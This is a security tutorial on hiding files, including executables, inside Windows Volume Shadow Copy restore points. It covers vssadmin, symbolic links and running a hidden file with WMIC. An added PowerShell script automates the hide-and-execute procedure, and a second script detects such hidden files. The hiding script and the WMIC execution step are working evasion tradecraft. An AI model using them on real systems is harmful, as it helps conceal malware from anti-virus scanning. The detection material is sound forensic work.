
Volume Shadow Copy Data Hiding

Tutorial Key Facts
Supported Operating System: Windows 7, Vista
File System Type: NTFS
Last Update: 2014/07/07
Author: Nihad Hassan
The Volume Shadow Copy Service (VSS) is available in both Windows Vista and Windows 7. It coordinates the actions required to create a consistent, point-in-time snapshot of the data on a volume, and such snapshots are taken at regular intervals. Most users meet this feature through System Restore, which lets them return system files to a previous stable state after a failure (for example a failed software installation, a bad uninstallation of a program, or a wrong registry modification). Shadow copies work only on volumes formatted with NTFS, and they can be created on local or external (removable or network) volumes as needed [1][2].

The snapshots created by VSS (restore points) are not taken on a fixed schedule. System Restore usually creates one before software is installed or uninstalled and before a system update; beyond that it is hard to predict when a snapshot will be taken, but two conditions have to hold: the system must have been idle for at least 10 minutes, and a portable PC must be running on AC power. When both conditions are met, you can expect a scheduled restore point roughly every two days under Windows Vista and every 7 to 8 days under Windows 7. You can of course still create a restore point manually at any time [3].

It is important to note that a shadow copy is not an image of the entire drive. VSS works at the block level, below the file system: it tracks writes to the blocks of the volume and, when a block is about to be overwritten, copies the original block into the shadow copy storage area (a hidden store on the volume whose contents are read-only) before the write goes through. A block that has not changed since the last snapshot is not copied again, so a restore point holds only the blocks that changed after the previous one. In that sense VSS is incremental, like the incremental backup concept used for databases: it stores only the modifications made to a file since the last snapshot.

To configure the VSS service under Windows 7, open System >> Properties >> System Protection.


Figure 1: Configuring restore points under Windows 7


Through the “Configure” button we can turn system protection on or off for each listed volume, set the disk space allocated to shadow copies, and delete the existing restore points.

This introduction is necessary to understand how VSS works; now we can explore how VSS snapshots can be used to hide data or malicious software.

We can administer VSS with the vssadmin utility that ships with both Vista and Windows 7. Open an elevated Command Prompt (vssadmin refuses to run without administrator rights) and type vssadmin to see the available commands; vssadmin list volumes lists all NTFS volumes on the system that are eligible for shadow copies.

The command vssadmin list shadowstorage shows the shadow copy storage associations and the disk space used, allocated and allowed on each volume; in my case only the C: volume has VSS enabled [4].

Figure 2: Listing volumes with shadow copy enabled


vssadmin list shadows /for=c: lists all existing shadow copies of the specified volume; here I am listing volume C: only. Without the /for parameter, vssadmin list shadows lists the shadow copies of all volumes on the PC.

Figure 3: Shadow copies available on drive C:, showing only the last restore point, which carries the number 6

Here I am showing the most recent shadow copy on my system: my C: volume has 6 snapshots (restore points), and this is the last one created.

Now we are ready to explain how to hide data, or a piece of malware, inside one of the available restore points. Let us create a new folder on the C: volume named TestShadow and copy an executable file into it (any kind of file will do).

Figure 4: Creating the directory C:\TestShadow and storing mspass.exe inside it

I have only one file inside my C:\TestShadow folder (mspass.exe). To hide this file in a VSS snapshot, I need to create a new restore point that captures the newly created file. Go to Control Panel >> System >> System Protection >> System Protection tab and click “Create”. A new window asks for a name for the restore point; I call it “DarknessGateRestorePoint” and click “Create”.

 

Figure 5: Create new restore point under Windows 7


Now I run vssadmin list shadows again to check that a new restore point has been created.

Figure 6: New restore point successfully created


As Figure 6 shows, a new restore point has been created; I now have 7 restore points on my system.

Let us return to the folder C:\TestShadow and delete the executable mspass.exe from it.

My file mspass.exe has now been deleted from the live file system, but it is still inside the newly created restore point, whose device name is \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7. To reach mspass.exe inside that restore point, I create a directory symbolic link to the shadow copy, saved as a folder named RetrievedFiles in my current working directory, as shown in Figure 7.


We use the DIR command to see the new symbolic link inside our working directory.

Figure 7: Create a Symbolic link and point it to my last restore point


We can browse the contents of the retrieved volume copy either directly in Explorer or from the command prompt; inside the copy, the TestShadow folder still contains our file mspass.exe.


Figure 8: Accessing mspass.exe inside our last restore point


After confirming that the hidden file is still there inside the new restore point, we can delete the symbolic link pointing to the volume copy and execute the hidden program directly with the WMIC command.

Figure 9: Executing mspass.exe from inside last created system snapshot


After running the command, our hidden mspass.exe pops up on the screen, confirming that it executed from inside the shadow copy.

Note in Figure 9 that the \\?\ prefix of the shadow copy device name has been replaced by \\.\ (a period instead of the question mark): WMIC requires the \\.\ form of the path.
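The whole procedure above, from listing the shadow copies of C: through staging, snapshotting, deleting and finally executing the file with WMIC, as an added PowerShell example; it is not part of the original tutorial. It queries the WMI class Win32_ShadowCopy instead of parsing vssadmin output, creates the restore point with Checkpoint-Computer instead of the System Protection dialog, and uses calc.exe as a stand-in for mspass.exe. The folder names C:\TestShadow and C:\RetrievedFiles and the restore point name follow the tutorial; the payload name and everything else are assumptions. Run it from an elevated PowerShell prompt on Windows Vista / 7 with System Protection enabled for C:.

```powershell
# Added example (not from the tutorial). Requires an elevated PowerShell prompt on
# Windows Vista / 7 with System Protection enabled for C:.
$ErrorActionPreference = 'Stop'
$stage   = 'C:\TestShadow'          # folder name from the tutorial
$payload = "$stage\payload.exe"     # stand-in for mspass.exe (assumption)
$link    = 'C:\RetrievedFiles'      # symbolic link name from the tutorial

# 0. Stage the file that is meant to survive only inside the shadow copy.
New-Item -ItemType Directory -Path $stage -Force | Out-Null
Copy-Item "$env:SystemRoot\System32\calc.exe" $payload

# 1. Create a restore point: System Restore snapshots C: and the staged file goes with it.
Checkpoint-Computer -Description 'DarknessGateRestorePoint' -RestorePointType 'MODIFY_SETTINGS'

# 2. Locate the newest shadow copy of C: (the WMI equivalent of "vssadmin list shadows /for=c:").
$cVolume = (Get-WmiObject Win32_Volume -Filter "DriveLetter='C:'").DeviceID   # \\?\Volume{GUID}\
$shadow  = Get-WmiObject Win32_ShadowCopy |
           Where-Object { $_.VolumeName -eq $cVolume } |
           Sort-Object { [Management.ManagementDateTimeConverter]::ToDateTime($_.InstallDate) } |
           Select-Object -Last 1
"Newest shadow copy: $($shadow.DeviceObject)"   # \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN

# 3. Remove the live copy; from now on only the snapshot holds the file.
Remove-Item $payload

# 4. Reach it through a directory symbolic link (mklink /D needs the trailing backslash).
cmd /c mklink /D $link "$($shadow.DeviceObject)\" | Out-Null
Get-ChildItem "$link\TestShadow"        # payload.exe is listed although it is gone from C:\TestShadow

# 5. Drop the link and run the file straight out of the shadow copy via WMIC,
#    which wants the \\.\ form of the device path instead of \\?\.
cmd /c rmdir $link | Out-Null            # rmdir removes the link only, never the snapshot
$hidden = $shadow.DeviceObject.Replace('\\?\', '\\.\') + '\TestShadow\payload.exe'
wmic process call create "$hidden"
```

Step 2 is also a replacement for the vssadmin listing earlier in the tutorial: the DeviceObject property carries the same \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN name that vssadmin prints as "Shadow Copy Volume", and InstallDate is the creation time. On Windows 8 and later, Checkpoint-Computer refuses to create a second restore point within 24 hours unless the SystemRestorePointCreationFrequency registry value is lowered, so the script as written targets the Vista / 7 behaviour the tutorial describes.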

In summary, data can be hidden inside system restore points, and if the hidden data is an executable it can be run with the WMIC command without creating any symbolic link. Most anti-virus software does not scan volume shadow copies for malware and other threats. Remember, however, that shadow copy storage is limited in space and time: if you store large files, the system has to delete older restore points to make room for new ones. If the files are small and the PC sees regular use, a restore point may survive for at least 5 months under Windows 7, which is more than enough time for an attacker to act against the machine.
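The observation that anti-virus rarely looks inside shadow copies points to the check a defender should run: mount every shadow copy of C:, and list the files that exist in a snapshot but no longer exist on the live volume, the exact pattern the tutorial produces. This is an added PowerShell example, not part of the tutorial; it uses Win32_ShadowCopy and the same mklink /D trick, assumes an elevated prompt on Windows Vista / 7, and is limited by the assumed variable $ScanRoot to the tutorial's TestShadow directory (set it to '' to sweep the whole volume, which is slow).

```powershell
# Added example (not from the tutorial): find files that survive only inside shadow copies of C:.
# Assumptions: elevated PowerShell on Windows Vista / 7; $ScanRoot is relative to the volume root.
$ScanRoot = 'TestShadow'     # '' sweeps the whole volume (slow)
$drive    = 'C:'

function Get-Sha256Hex([string]$Path) {
    # .NET hashing keeps this working on PowerShell 2.0, which has no Get-FileHash.
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs  = [System.IO.File]::OpenRead($Path)
    try     { ($sha.ComputeHash($fs) | ForEach-Object { $_.ToString('x2') }) -join '' }
    finally { $fs.Close() }
}

# Index the live volume: path relative to the volume root -> present.
$live = @{}
if (Test-Path "$drive\$ScanRoot") {
    Get-ChildItem "$drive\$ScanRoot" -Recurse -Force |
        Where-Object { -not $_.PSIsContainer } |
        ForEach-Object { $live[$_.FullName.Substring(3)] = $true }   # strip "C:\"
}

$cVolume = (Get-WmiObject Win32_Volume -Filter "DriveLetter='$drive'").DeviceID
foreach ($sc in Get-WmiObject Win32_ShadowCopy | Where-Object { $_.VolumeName -eq $cVolume }) {
    $link = "$env:TEMP\vss_" + $sc.ID.Trim('{}')       # one throwaway link per snapshot
    cmd /c mklink /D $link "$($sc.DeviceObject)\" | Out-Null
    try {
        if (Test-Path "$link\$ScanRoot") {
            Get-ChildItem "$link\$ScanRoot" -Recurse -Force |
                Where-Object { -not $_.PSIsContainer } |
                ForEach-Object {
                    $rel = $_.FullName.Substring($link.Length + 1)
                    if (-not $live.ContainsKey($rel)) {
                        # Present in the snapshot, gone from the live file system.
                        # Hash it so the file can be checked against AV or threat intel offline.
                        New-Object PSObject -Property @{
                            Shadow  = $sc.DeviceObject
                            Created = [Management.ManagementDateTimeConverter]::ToDateTime($sc.InstallDate)
                            File    = $rel
                            SHA256  = Get-Sha256Hex $_.FullName
                        }
                    }
                }
        }
    } finally {
        cmd /c rmdir $link | Out-Null        # removes the link only, never the snapshot
    }
}
```

On a full-volume sweep every ordinary deletion shows up as well, so the output is a candidate list, not an alert list; the hashes are what you compare against your scanner or threat intelligence. The same link-and-walk loop is the way to feed an on-demand anti-virus scan a shadow copy it would otherwise never see, and vssadmin delete shadows is the remediation once a snapshot is known to carry something hostile.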

On The Web:

[1] Wikipedia. Shadow Copy. Available at: https://en.wikipedia.org/wiki/Shadow_Copy [Accessed 2014/03/26].

[2] Microsoft TechNet. Volume Shadow Copy Service. Available at: http://technet.microsoft.com/en-us/library/ee923636.aspx [Accessed 2014/03/26].

[3] What you should know about Volume Shadow Copy/System Restore in Windows 7 & Vista (FAQ). Available at: http://blog.szynalski.com/2009/11/23/volume-shadow-copy-system-restore/ [Accessed 2014/03/27].

[4] Michael Raggo, Chet Hosmer (2013). Data Hiding: Exposing Concealed Data in Multimedia, Operating Systems, Mobile Devices and Network Protocols. Chapter 7. Syngress, USA.

Permanent link to this article: http://www.darknessgate.com/security-tutorials/date-hiding/volume-shadow-copy-data-hiding/